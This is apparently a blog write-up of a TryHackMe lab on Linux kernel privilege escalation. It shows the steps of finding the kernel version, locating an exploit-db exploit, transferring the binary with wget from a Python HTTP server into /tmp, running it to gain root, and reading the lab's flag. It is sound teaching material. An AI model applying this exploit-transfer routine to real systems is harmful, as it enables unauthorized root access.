SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Kernel Exploits - Linux Privilege Escalation

Nguyen Nguyen included in Penetration Testing
   865 words   5 minutes 

Note: If you need to zoom in, you can click on the image.

This post used the Linux Privilege Escalation Room at TryHackMe for lab. https://tryhackme.com/room/linprivesc

Definition of a Kernel: Core component of an operating system that powers and controls the computer system.

You can think of a Kernel as a Car engine. Car engine is the core component that powers and controls the entire vehicle.

When you successfully control the kernel that mean you have root privilege meaning you can do anything you want.

The Kernel exploit methodology

  1. Identify the kernel version
  2. Search and find an exploit code for the kernel version of the target system
  3. Run the exploit

Please be aware that a failed kernel exploit can lead to a system failure/crash.

To find exploit code, you can google the kernel version of your system and add exploit at the end. Furthermore, you can check exploit-db to see if there has been any publication of vulnerabilities for that kernel version. Additional Resource: https://www.linuxkernelcves.com/cves

Here are some hints/notes from TryHackMe:
Hints/Notes:

  1. Being too specific about the kernel version when searching for exploits on Google, Exploit-db, or searchsploit

  2. Be sure you understand how the exploit code works BEFORE you launch it.

    Some exploit codes can make changes on the operating system that would make them unsecured in further use or make irreversible changes to the system, creating problems later.

    Of course, these may not be great concerns within a lab or CTF environment, but these are absolute no-nos during a real penetration testing engagement.

  3. Some exploits may require further interaction once they are run. Read all comments and instructions provided with the exploit code.

  4. You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.

Demonstration

This is all done in the TryHackMe lab that are provided to the user.

In this Kernel Exploits Lab, TryHackMe has provided us the username and password of the victim machine. The problem is that this user has low-privilege. Our job is to gain root access using kernel exploit. Let’s begin.

The first thing we need to do is identify the kernel version this operating system is running on. To do this, we can use multiple command that will return us the same result: uname -a,cat /proc/version

Here is a screenshot of the privilege that the user currently has.

Kernel version: `Linux 3.13.0-24-generic`

The next step is to look up the kernel version and see if there is any exploits that correspond to that kernel. This is what I found: https://www.exploit-db.com/exploits/37293

Now, I will download the exploit onto my attacker box and compile the code.

Now, I will transfer my malicious program to my victim machine. One method of doing this is by using wget and python http server.

To start the http server: python -m http.server port number

A problem suddenly pop up. It look like the current directory that I am in (/)-which is root doesn’t allow file to be written to. That mean we have to find another directory to download our malicious program.

The next step we can do is using the command: ls -al

This command allow us to look at the permission given to each directory. The current directory we are in is “/” which is root. The privilege that is present is: drwx------


Let break it down:
d = Stand for directory.

Then we split it into groups. Each group have 3 item.
For example: |rwx|---|---|
The first group is owner, The second group is group, The third group is others (everyone else).
The owner (root) has read, write, execute, the group doesn’t have any privilege and same goes for others. That why I couldn’t download the exploit to the target machine in that directory. I fall into the others category because my account is karen.
Knowing this information, we need to find an directory that allow us to write to the directory. Let’s go back to the picture.


The directory /tmp caught my eyes. We can read, write, execute on the directory. That the directory we are going to use. To download the malicious file, I am going execute this command:
`wget http://target_ip:port/item_to_download`
But first I have to change the directory to /tmp

Now, let change the permission on the malicious program so that it can execute. `chmod +x malicious_program
Then run it using `./word`
After running the malicious program, I will run id to check if I got root access.

After that, I have to find the file, flag1.txt. To find this file, I will run the following command: `find / -name flag1.txt`

What this command does is it start from root and make it way down searching for flag1.txt and give the location of where the file is located at. The file is at: `/home/matt/flag1.txt`. Now, all I have to do is run a cat command: `cat /home/matt/flag1.txt` and I should have the flag.

Flag: `THM-28392872729920`

Important lesson:
- When transferring the exploit to the victim machine, make sure the directory you're downloading (writing) to allow you to have write permission and additionally allow you to execute the malicious program.
That is all for my post. Thanks for reading.
Updated on 2023-06-23
 Red TeamLinux
Back | Home